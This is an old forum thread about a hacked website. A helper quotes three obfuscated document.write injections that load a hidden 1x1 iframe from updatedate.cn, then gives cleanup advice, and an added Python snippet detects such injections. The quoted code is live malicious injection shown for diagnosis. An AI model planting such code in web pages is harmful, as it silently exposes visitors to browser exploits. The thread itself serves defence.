no link like that
Sleger, where did you get that malware updatedate.cn warning? Google? I just had my host do a scan again and found nothing. I scanned my computer and nothing. I looked at the two placeholders and there is no link to updatedate.cn in either. I think that is old what you have. I notice the date is the 7th. Last week I did have issues with the site. There were infections on the host server, but were cleaned. It should be safe now.
Quote:
I think that is old what you have.
Mike, the date indicated by the alert is the 7th month, unless you have a 15 month calendar ;)
2009-07-15 = July 15th 2009.
You have to take it up with Google - they do the scan and likely have better tools than your host, but it may be a false positive.
If you have Google Chrome installed, you can see for yourself.
Thanks for your help sleger.
Google is quite right (as it almost always is in these cases). You are hacked to pieces. 'View Source' on your page, just after the body tag:
Code:
{{script}}document.write("{{"+"i"+"f"+"rame src=http:"+"//upda"+"t"+"edat"+"e."+"c"+"n/"+" height=1 width"+"=1"+"}}"+"{{/if"+"ram"+"e}}");{{/script}}
{{script}}document.write("{{i"+ "f"+"rame "+"s" +"rc=ht"+ "t"+"p:"+ "//"+"u"+"p" +"da"+"tedat"+ "e.cn/ "+ "hei" +"g"+"ht" +"="+"1" +" " +"width=1}}"+ "{{" +"/" +"if"+"rame}}");{{/script}}
{{script}}document.write("{{if"+"rame "+"s" +"r"+"c=http:/"+"/u" +"pd"+"ateda" +"te"+".cn"+"/ " +"hei"+"g"+"h"+"t=1" +" "+"wi"+"dth="+"1"+"}}{{"+"/ifram"+"e" +"}}");{{/script}}
(Angle brackets replaced with braces to try to avoid triggering paranoid AV tools.) This shows you've been hacked three times by the same automated attack (clearly it hasn't noticed that it already owned your site).
These attacks are at the moment concentrating on two methods: gaining access to the web server through insecure web applications (typically PHP) installed on it, and stealing passwords from compromised end-user machines.
As well as asking your host to check the server for compromise, and changing your account password, you need to check your end. Since I don't see infections on other sites on the same server, it is likely that your own computer is infected. You could have got it from viewing another web site that has the same infection as yours; then, when you uploaded pages to your site, the malware sniffed your password and leaked it to the attackers. Check your machine with multiple online AVs, but don't trust them to find and remove everything because AV today is not reliable - instead, consider re-installing Windows, changing all your passwords, using SFTP instead of FTP to upload files to the server, and don't install plugins you don't absolutely need.
All: do NOT visit chowardcompany or updatedate, or you'll be hit with a variety of browser exploits including attacks against Adobe Reader and Flash. Do not rely on your anti-virus to catch web exploits, AV simply cannot keep up at the moment.
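Added example, not part of any post in this thread: a Python check a site owner could run over their own page source to find the kind of injection quoted above, where document.write assembles a 1x1 iframe from split string literals. The function names, the 2-pixel threshold and the example.invalid sample are assumptions made for the illustration.

```python
import re

# document.write( "lit" + "lit" + ... ) with only string literals inside.
# Assumes literals contain no escaped quotes, as in the snippets quoted above.
LIT = r"""(?:"[^"]*"|'[^']*')"""
WRITE_RE = re.compile(r"document\.write\(\s*(" + LIT + r"(?:\s*\+\s*" + LIT + r")*)\s*\)")
LITERAL_RE = re.compile(r""""([^"]*)"|'([^']*)'""")
IFRAME_RE = re.compile(r"<\s*iframe\b[^>]*>", re.I)
SRC_RE = re.compile(r"""\bsrc\s*=\s*["']?([^\s"'>]+)""", re.I)
DIM_RE = re.compile(r"""\b(height|width)\s*=\s*["']?(\d+)""", re.I)


def join_literals(expr):
    """Return (joined text, fragment count) for a "a"+"b"+... expression."""
    parts = [a or b for a, b in LITERAL_RE.findall(expr)]
    return "".join(parts), len(parts)


def find_hidden_iframes(html, max_px=2):
    """List (src, fragment count) for document.write calls that emit an
    iframe whose stated height/width are all <= max_px (assumed threshold)."""
    # Accept the thread's brace notation as well as real angle brackets.
    html = html.replace("{{", "<").replace("}}", ">")
    hits = []
    for call in WRITE_RE.finditer(html):
        written, fragments = join_literals(call.group(1))
        for tag in IFRAME_RE.findall(written):
            dims = [int(v) for _, v in DIM_RE.findall(tag)]
            src = SRC_RE.search(tag)
            if src and dims and all(v <= max_px for v in dims):
                hits.append((src.group(1), fragments))
    return hits


# Constructed sample in brace notation; example.invalid is a placeholder host.
SAMPLE = '''{{body}}
{{script}}document.write("{{"+"i"+"f"+"rame src=http:"+"//exam"+"p"+"le.inv"+"alid/"+" height=1 width"+"=1"+"}}"+"{{/if"+"ram"+"e}}");{{/script}}
{{script}}document.write("{{iframe src='/banner' width=468 height=60}}{{/iframe}}");{{/script}}
{{p}}Welcome{{/p}}'''

if __name__ == "__main__":
    for src, fragments in find_hidden_iframes(SAMPLE):
        print(f"hidden iframe -> {src} (built from {fragments} string fragments)")
```

A hit on a page you did not edit yourself means the file was modified on the server, so the cleanup steps in the post above (host check, password change, checking your own machine) apply even after the injected lines are deleted.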
Thanks for that, Bob.
For those of us who have already visited the infected site, 1) is there some way to know if we have become infected, and if so 2) how might we restore a healthy computer state?
OK, I tried the payload on a virtual machine. For me at the moment it installs a system tray "You have spyware!" scareware promotion for a rogue AV called 'PC Security 2009' and a driver that attempts to kill any actual AV software loaded. It also restarted the machine, so if you got infected by that you'd probably notice.
(However, the payloads used by web exploits can and do change...)
Well, I must apologise to you all. Had I known that there was an issue, I would not have posted any requests to visit my site. My host said it was safe with no problems. My computer comes up clean also. I have deleted the site and I am now in the process of reinstalling my computer OS. Again, I hope you accept my apologies. I do like this forum and almost depend on it at times. I would never intentionally put the participants at risk.
Thanks for your time,
Mike